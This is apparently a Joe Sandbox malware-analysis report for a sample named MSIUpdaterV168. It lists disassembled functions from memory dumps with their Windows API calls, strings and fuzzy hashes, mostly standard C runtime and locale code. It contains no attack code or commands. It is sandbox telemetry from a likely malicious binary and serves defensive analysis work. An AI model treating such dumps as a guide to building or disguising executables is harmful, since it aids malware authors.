Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: c4794159e6540b649a3d67de16813679556eec684bb08b994e7e749f5fd85ee3
Instruction ID: 1d159aca027162fa2d104e2deff77667bc934719a86cba313fe13453de70d478
Opcode Fuzzy Hash: c4794159e6540b649a3d67de16813679556eec684bb08b994e7e749f5fd85ee3
Instruction Fuzzy Hash: FE51A075A00209AFDB24DFA4EC81EAE77B8AF19700F044429F915EB191E7B0DA41CB61

Function 0013D599 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001341E0: GetLastError.KERNEL32(?,00000008,0013708C), ref: 001341E4
Part of subcall function 001341E0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00134286

GetACP.KERNEL32(?,?,?,?,?,?,00132903,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0013D65A
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00132903,?,?,?,00000055,?,-00000050,?,?), ref: 0013D685
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0013D7E8

Strings

utf8, xrefs: 0013D757

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 6a3a0f2752901cad0588dd70ea19b7086ecba93ae692cc1fef7158d8d5f46d3c
Instruction ID: 61b6a5167239ea2e5ff5fe599fa339ffd92a794e484b14192d82a997fbbbd363
Opcode Fuzzy Hash: 6a3a0f2752901cad0588dd70ea19b7086ecba93ae692cc1fef7158d8d5f46d3c
Instruction Fuzzy Hash: D67104B5600702AADB24AB74FC87BBA77ACEF54704F144429F519DB191EB70ED40C7A1

Function 00135289 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00135316

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
Instruction ID: 573927db39e96cf3356e37b6110489e56a083775955d99d0aad6fe222a4ceb15
Opcode Fuzzy Hash: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
Instruction Fuzzy Hash: B5B16772E04A459FDB158F28C8817FEBBB7EF54740F15816AE801AB341E374AD01CBA0

Function 00127CC9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00127CD5
IsDebuggerPresent.KERNEL32 ref: 00127DA1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00127DBA
UnhandledExceptionFilter.KERNEL32(?), ref: 00127DC4

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 55a00752a8d0f49b624df10d17763d75650dba418064444a4dd3d0f452ccfe3b
Instruction ID: e263fbf943847b092b281d73325fd1fc7c404b7f6a527ecb3b31665da2385667
Opcode Fuzzy Hash: 55a00752a8d0f49b624df10d17763d75650dba418064444a4dd3d0f452ccfe3b
Instruction Fuzzy Hash: 28310C79D052299BDF20DFA4D9497CDBBB4BF08304F1041DAE40CAB250EB719A84CF45

Function 00121EE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00121EF5
std::_Lockit::_Lockit.LIBCPMT ref: 00121F0F
std::_Lockit::~_Lockit.LIBCPMT ref: 00121F30
std::_Lockit::~_Lockit.LIBCPMT ref: 00121F88
std::_Lockit::_Lockit.LIBCPMT ref: 00121FCD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0012201E
__Getctype.LIBCPMT ref: 00122035
std::_Facet_Register.LIBCPMT ref: 0012205F
std::_Lockit::~_Lockit.LIBCPMT ref: 00122078

Part of subcall function 001250AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001250B6

Strings

bad locale name, xrefs: 00122087

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 2137871723-1405518554
Opcode ID: 7bfd3f2d1fc73018e4d00fdeeb0cf6153697b12930a93752051723659f037af1
Instruction ID: 53ae389e930f2203ab10782af3a109d868a7d9694e4f406511a60cbaee26b4fc
Opcode Fuzzy Hash: 7bfd3f2d1fc73018e4d00fdeeb0cf6153697b12930a93752051723659f037af1
Instruction Fuzzy Hash: 59410131904360AFC320DF28F584B6AB7E0EFA0710F15094CF8959B252D771ED59CB92

Function 001220A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001220B2
std::_Lockit::_Lockit.LIBCPMT ref: 001220CF
std::_Lockit::~_Lockit.LIBCPMT ref: 001220F0
std::_Lockit::~_Lockit.LIBCPMT ref: 0012214B
std::_Lockit::_Lockit.LIBCPMT ref: 0012218C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001221CF
std::_Facet_Register.LIBCPMT ref: 001221F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00122211

Part of subcall function 001250AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001250B6

Strings

bad locale name, xrefs: 00122220

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 3096327801-1405518554
Opcode ID: f9f1079b5aefac7c6657c5fe6a07d310057effb79c5d37de39d4fe78c1983185
Instruction ID: e5b91792c276e26cd4735373f73be87c165a044e6bde04076219d4b5843b9f4e
Opcode Fuzzy Hash: f9f1079b5aefac7c6657c5fe6a07d310057effb79c5d37de39d4fe78c1983185
Instruction Fuzzy Hash: 1741CE719443619FC320DF28F881A5EBBE1BFA4710F05495DF9859B212D731EE25CB92

Function 00122FB0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00123011
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00123058
Concurrency::cancel_current_task.LIBCPMT ref: 0012311A
Concurrency::cancel_current_task.LIBCPMT ref: 0012311F
Concurrency::cancel_current_task.LIBCPMT ref: 00123124

Strings

false, xrefs: 001230B2
true, xrefs: 001230D8
bad locale name, xrefs: 00123129

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 1be44e73e8c681f6bc08bd86fe3d9e1f3a46b6f4e6e75e46dfcd551ea26e20f4
Instruction ID: 08c543f2967b7deebaa764031cc94289c58518d7a47c0ed942d06e908fac2246
Opcode Fuzzy Hash: 1be44e73e8c681f6bc08bd86fe3d9e1f3a46b6f4e6e75e46dfcd551ea26e20f4
Instruction Fuzzy Hash: 9E4116705047609FC320DF64A88179BFBE1BF54700F44482DF8988B262E7B5DA68CBA6

Function 00127152 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00127158
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00127166
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00127177
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00127188

Strings

GetCurrentPackageId, xrefs: 00127160
GetTempPath2W, xrefs: 0012717D
GetSystemTimePreciseAsFileTime, xrefs: 0012716C
kernel32.dll, xrefs: 00127153

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: acb5eb5130b63d9d8386c10834615fb277b2bb576dfcd7e1cfa40bccf498ef92
Instruction ID: 79f78860d9b4c34fdf0d2d9bed71e035ebda07a0ed6e1bf19805bd818a2ed284
Opcode Fuzzy Hash: acb5eb5130b63d9d8386c10834615fb277b2bb576dfcd7e1cfa40bccf498ef92
Instruction Fuzzy Hash: 95E0EC79981760BFC700AFB0BC5DD963EA9BB0B7563440416F401D3571D7B049408BE1

Function 0012A918 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0012AA37
___TypeMatch.LIBVCRUNTIME ref: 0012AB45
_UnwindNestedFrames.LIBCMT ref: 0012AC97
CallUnexpected.LIBVCRUNTIME ref: 0012ACB2

Strings

csm, xrefs: 0012A9C2
csm, xrefs: 0012A955
csm, xrefs: 0012AA6E

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 3d52acbc7a6efd847a4cc83468f6ebaa0913c4b90f6fbdf05aecc402b5db48ff
Instruction ID: b64317338332600c523e264ddb282629ec68a2fee7c994914b537d1dc25338c5
Opcode Fuzzy Hash: 3d52acbc7a6efd847a4cc83468f6ebaa0913c4b90f6fbdf05aecc402b5db48ff
Instruction Fuzzy Hash: BDB18C71C00229DFCF19DFA4E9819AEBBB5FF18310B95455AE8056B202D731DA71CF92

Function 00139C65 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00139EDE

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: ce2e2d76ddd629e7e9ec299fdeee160a0c42db96b26f43c3e3bebf9a72f94498
Instruction ID: 94fc610cdc0991b8d3b636de9fe7a1c26b5fd5830e70671b35f77bbac4da90e6
Opcode Fuzzy Hash: ce2e2d76ddd629e7e9ec299fdeee160a0c42db96b26f43c3e3bebf9a72f94498
Instruction Fuzzy Hash: 66B1E370E04249AFDB15DF99D881BAEBFF5BF59310F144169E805AB392C7B09D42CB60

Function 00142504 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 001425AA
__alloca_probe_16.LIBCMT ref: 00142665
__alloca_probe_16.LIBCMT ref: 001426F4
__freea.LIBCMT ref: 0014273F
__freea.LIBCMT ref: 00142745
__freea.LIBCMT ref: 0014277B
__freea.LIBCMT ref: 00142781
__freea.LIBCMT ref: 00142791

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 223714bad9202265f0ed6a869fdf1f5215e59f47b4912f0793a560da49fd2b01
Instruction ID: 63a5353b2cd719a99358b19d61e1c8b65b8399a9ae86787e7d1821da47027269
Opcode Fuzzy Hash: 223714bad9202265f0ed6a869fdf1f5215e59f47b4912f0793a560da49fd2b01
Instruction Fuzzy Hash: E571F972A042055BDF219F549C91BEE7BBAAF69311FA50019FC04BB2A1EB75DC80C7A0

Function 00126E28 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00126E71
__alloca_probe_16.LIBCMT ref: 00126E9D
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00126EDC
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00126EF9
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00126F38
__alloca_probe_16.LIBCMT ref: 00126F55
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00126F97
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00126FBA

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 7c9b318fd4ac1dc2ac557ffe8b8aa56c54e218b55ded6827f89bc4ec504f77e3
Instruction ID: e9caac9bedd489a6cc91b3814e98ccf52902b659f7f68c545a4f5aaee192bf96
Opcode Fuzzy Hash: 7c9b318fd4ac1dc2ac557ffe8b8aa56c54e218b55ded6827f89bc4ec504f77e3
Instruction Fuzzy Hash: 0351BF7690022AAFEF209F64FD55FAB7BB9EF50750F254425F914E61E0E7309D208BA0

Function 001259BD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001259C4
std::_Lockit::_Lockit.LIBCPMT ref: 001259CE

Part of subcall function 00122CF0: std::_Lockit::_Lockit.LIBCPMT ref: 00122CFF
Part of subcall function 00122CF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00122D1A

codecvt.LIBCPMT ref: 00125A08
std::_Facet_Register.LIBCPMT ref: 00125A1F
std::_Lockit::~_Lockit.LIBCPMT ref: 00125A3F

Strings

`<., xrefs: 001259D9

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: `<.
API String ID: 712880209-414410242
Opcode ID: b7bc555081876800ff0d44d47e87e184b4164af4fe2c423643d8f3f23a220e7d
Instruction ID: 3ad3c76b88f58d180212e52a759fe79cf60b68d1d7dc373c40d4a93e93e9a4da
Opcode Fuzzy Hash: b7bc555081876800ff0d44d47e87e184b4164af4fe2c423643d8f3f23a220e7d
Instruction Fuzzy Hash: F711B4719006349FCB14EF68E8856AEBBB5AF54710F140509F405A7292DF70EE10CB91

Function 00122230 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0012223D
std::_Lockit::_Lockit.LIBCPMT ref: 0012225B
std::_Lockit::~_Lockit.LIBCPMT ref: 0012227C
std::_Lockit::~_Lockit.LIBCPMT ref: 001222CC
std::_Facet_Register.LIBCPMT ref: 001222F6
std::_Lockit::~_Lockit.LIBCPMT ref: 0012230F

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 15142accccd62aec5cf53a85fbc67f1893b5d548cfe2c4adf8e267659c2577c0
Instruction ID: 300b1836e65dc3717e00016d9dcc32ea2cd7de0bd6148ef300e5cda05238ed05
Opcode Fuzzy Hash: 15142accccd62aec5cf53a85fbc67f1893b5d548cfe2c4adf8e267659c2577c0
Instruction Fuzzy Hash: 9B2126319002719FC725EF18F88896EB7A0FBA4321F15061DF8419B252E735AE19CBD2

Function 0012A5AA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0012A5A1,00128CDA,00127E75), ref: 0012A5B8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0012A5C6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0012A5DF
SetLastError.KERNEL32(00000000,0012A5A1,00128CDA,00127E75), ref: 0012A631

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 303c8d5afd125029418d83f8291838c43823ffd21aec79e22c114385f97b10ba
Instruction ID: 742d4e2d35157484dd355dbfc7f853aeb12d8361c85ab98c4e7e4dbaa9d983b9
Opcode Fuzzy Hash: 303c8d5afd125029418d83f8291838c43823ffd21aec79e22c114385f97b10ba
Instruction Fuzzy Hash: B9012B3250E331AFA77427B47CDA56B3788EF61779B300329F210851F2EFA14C655649

Function 001445D0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

OffsetRect.USER32(00000000,00000000,00000000), ref: 001446F6

Strings

0, xrefs: 00144788
x<., xrefs: 0014477B
x<., xrefs: 001447C9
Zatlat, xrefs: 00144630

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: OffsetRect
String ID: 0$Zatlat$x<.$x<.
API String ID: 177026234-2731464087
Opcode ID: 308502d29674da4734fd077af7b5fc04183a64eb99cd9b2317930708febe68c2
Instruction ID: 9f9fe36d52a5424f91c7ffa2620d58991ab608cee9bd8e65ed93204cd035fc69
Opcode Fuzzy Hash: 308502d29674da4734fd077af7b5fc04183a64eb99cd9b2317930708febe68c2
Instruction Fuzzy Hash: BB910F715083809FE310DF64D89976FBBE0AFD5318F180A2CF9D88B2A2C7B5D9548B52

Function 00131FE6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E49B113A,?,?,00000000,00143CC0,000000FF,?,00131F76,?,?,00131F4A,00000016), ref: 0013201B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0013202D
FreeLibrary.KERNEL32(00000000,?,00000000,00143CC0,000000FF,?,00131F76,?,?,00131F4A,00000016), ref: 0013204F

Strings

mscoree.dll, xrefs: 00132014
CorExitProcess, xrefs: 00132025

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3814493c799a13e4e314005a71f1991920575609500a2d3fe5fb0d41114fbeae
Instruction ID: 8a2f681723ae7c77fafeffc2d23e77b5a0ed43e8ded42713b7ec31a58960d7f0
Opcode Fuzzy Hash: 3814493c799a13e4e314005a71f1991920575609500a2d3fe5fb0d41114fbeae
Instruction Fuzzy Hash: 3301A235900619EBCB259F50CC49BAEBBB9FB04B10F000525F811A66F0DBB49904CE90

Function 00137B03 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00137B8A
__alloca_probe_16.LIBCMT ref: 00137C4B
__freea.LIBCMT ref: 00137CB2

Part of subcall function 00135136: HeapAlloc.KERNEL32(00000000,00000001,?,?,00127FC8,?,?,?,?,?,001227FE,00000001,?), ref: 00135168

__freea.LIBCMT ref: 00137CC7
__freea.LIBCMT ref: 00137CD7

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: f837ec5534037d0146a73204fc8f8c42bc2c1b77034003fee8679e30fbf5892a
